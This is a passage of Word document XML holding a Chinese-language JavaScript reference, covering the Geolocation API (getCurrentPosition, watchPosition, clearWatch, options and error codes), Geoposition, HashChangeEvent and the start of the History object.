        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double heading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户前进的方向，从正北开始顺时针方向的角度，如果朝向不可用则为</w:t>
      </w:r>
      <w:r>
        <w:t>n ull</w:t>
      </w:r>
      <w:r>
        <w:t>。如果朝向信息可用但速度为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>heading</w:t>
      </w:r>
      <w:r>
        <w:t>值将为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double latitude</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户相对于赤道以北的</w:t>
      </w:r>
      <w:r>
        <w:t>纬度，十进制度数制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double longitude</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户相对于格林尼治子午线以东的经度，十进制度数制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double speed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用户的速度，单位为米每秒，如果速度信息不可用则为</w:t>
      </w:r>
      <w:r>
        <w:t>nul l</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性永远不会为负数值。可参见</w:t>
      </w:r>
      <w:r>
        <w:t>heading</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="830" w:name="Geolocation"/>
      <w:r>
        <w:t>Geolocation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="830"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>取得用户的纬度和经度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了确定用户精确地理位置的方法。在支持它的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以通过访问</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>形式的</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>象来访问。这儿描述的方法依赖一些其他类型：位置信息以</w:t>
      </w:r>
      <w:r>
        <w:t>Geoposition</w:t>
      </w:r>
      <w:r>
        <w:t>对象的形式报告，错误以</w:t>
      </w:r>
      <w:r>
        <w:t>GeolocationError</w:t>
      </w:r>
      <w:r>
        <w:t>对象的形式报告。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clearWatch(long watchId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>停止监视用户的位置。参数</w:t>
      </w:r>
      <w:r>
        <w:t>watchId</w:t>
      </w:r>
      <w:r>
        <w:t>的值必须是对应的</w:t>
      </w:r>
      <w:r>
        <w:t>watchPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void getCurrentPosition(function success,[function error],[object options])</w:t>
      </w:r>
      <w:r>
        <w:t>使用任何指定的</w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>（参见下面的</w:t>
      </w:r>
      <w:r>
        <w:t>optio</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的属性列表）来异步地确定用户的位置。这个方法会立刻返回，当用户的位置可用时，它将传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>Geoposition</w:t>
      </w:r>
      <w:r>
        <w:t>对象到指定的</w:t>
      </w:r>
      <w:r>
        <w:t>suc</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cess</w:t>
      </w:r>
      <w:r>
        <w:t>回调方法</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>中。如果发生了错误（可能用户不允许共享他的地理信息），并且定义了</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>回调方法</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>，它将传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>GeolocationError</w:t>
      </w:r>
      <w:r>
        <w:t>对象到错误回调方法中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long watchPosition(function success,[function error],[object options])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>，但在确定用户当前位置之后，它会继续监视用户的位置并在每次发现位置明显改变后调用</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>回调函数。本方法的返回值是一个数字，可将这个数字传入</w:t>
      </w:r>
      <w:r>
        <w:t>clearWatch()</w:t>
      </w:r>
      <w:r>
        <w:t>来停止追踪用户的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>watchPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>是一个常规的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象，带有零个或多个下列属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean enableHighAccuracy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个选项提示需要一个高精确度的位置，即使这需要</w:t>
      </w:r>
      <w:r>
        <w:t>更长时间来确定或者需要使用更多的电池功率。默认为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。在支持通过</w:t>
      </w:r>
      <w:r>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t>信号或</w:t>
      </w:r>
      <w:r>
        <w:t>GPS</w:t>
      </w:r>
      <w:r>
        <w:t>确定位置的设备上，将这个选项设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>一般意味着</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>GPS”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>long maximumAge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个选项指定传入</w:t>
      </w:r>
      <w:r>
        <w:t>successCallback</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个</w:t>
      </w:r>
      <w:r>
        <w:t>Geoposition</w:t>
      </w:r>
      <w:r>
        <w:t>对象可接受的最长生存时间（单位为毫秒）。默认为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，意思是每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>watchPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>将请求一次新的位置修正。比如，如果将这个选项设置为</w:t>
      </w:r>
      <w:r>
        <w:t>60 000</w:t>
      </w:r>
      <w:r>
        <w:t>，将允许返回任意一个在最近一分钟内确定的</w:t>
      </w:r>
      <w:r>
        <w:t>Ge</w:t>
      </w:r>
      <w:r>
        <w:t>oposition</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long timeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个选项指定了请求者愿意等待一次位置修正的时间，单位为毫秒。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。如果过去的时间超过</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒，则会调用</w:t>
      </w:r>
      <w:r>
        <w:t>errorCallback</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，询问用户是否同意共享位置信息的时间不算在</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>值内。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="831" w:name="GeolocationError"/>
      <w:r>
        <w:t>GeolocationError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="831"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查询用户位置时出现的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果确定用户位置的尝试失败了，错误回调函数将通过一个描述错误原因的</w:t>
      </w:r>
      <w:r>
        <w:t>GeolocationError</w:t>
      </w:r>
      <w:r>
        <w:t>对象调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些常量是</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned shor</w:t>
      </w:r>
      <w:r>
        <w:t>t PERMISSION_DENIED=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户不允许共享他或她的位置信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short POSITION_UNAVAILABLE=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于未指定原因，位置不能确定。例如，这可能是由于网络错误等引起的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short TIMEOUT=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在分配的时间内（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>中描述的</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>选项）不能确定位置信息。</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short code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性的值可能为上面</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个值之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关</w:t>
      </w:r>
      <w:r>
        <w:t>于错误的更多信息的消息。这条消息有助于调试，但不适合向最终用户显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="832" w:name="Geoposition"/>
      <w:r>
        <w:t>Geoposition</w:t>
      </w:r>
      <w:bookmarkEnd w:id="832"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>时间戳位置报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Geoposition</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示指定时间的用户的地理信息。这类对象只有两个属性：一个时间戳和一个保存了实际位置属性的</w:t>
      </w:r>
      <w:r>
        <w:t>Geocoordinates</w:t>
      </w:r>
      <w:r>
        <w:t>对象的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Geocoordinates coords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性引用一个</w:t>
      </w:r>
      <w:r>
        <w:t>Geocoordinates</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象的属性指定用户的纬度、经度等信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些坐标有效的时刻，形式为纪元开始后的毫秒数。如果需要，可以使用这个值来创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="833" w:name="HashChangeEvent"/>
      <w:r>
        <w:t>HashChangeEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="833"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件的</w:t>
      </w:r>
      <w:r>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当文档</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的片断标识符（</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中以哈希标识</w:t>
      </w:r>
      <w:r>
        <w:t>“#”</w:t>
      </w:r>
      <w:r>
        <w:t>开始的部分）发生变化时，浏览器将触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这可能是因为一</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>个脚本改变了</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也可能是因为用户使用了浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮在浏览器的历史中穿行。这两种情况都会触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。对应的事件对象是</w:t>
      </w:r>
      <w:r>
        <w:t>HashCha</w:t>
      </w:r>
      <w:r>
        <w:t>ngeEvent</w:t>
      </w:r>
      <w:r>
        <w:t>。关于</w:t>
      </w:r>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:r>
        <w:t>的历史管理以及</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件的更多信息请参考</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string newURL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性保存</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>的新值。注意这是完整的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，而不仅仅是它的</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string oldURL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性保存</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>的老值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="834" w:name="History"/>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:bookmarkEnd w:id="834"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>窗口的浏览历史</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示窗口的浏览历史。但是，由于隐私原因，它不允许脚本读取曾经访问过的真实的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>方法允许脚本将窗口在浏览历史中向前或向后移动，也可以添加新的条目到浏览历史中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
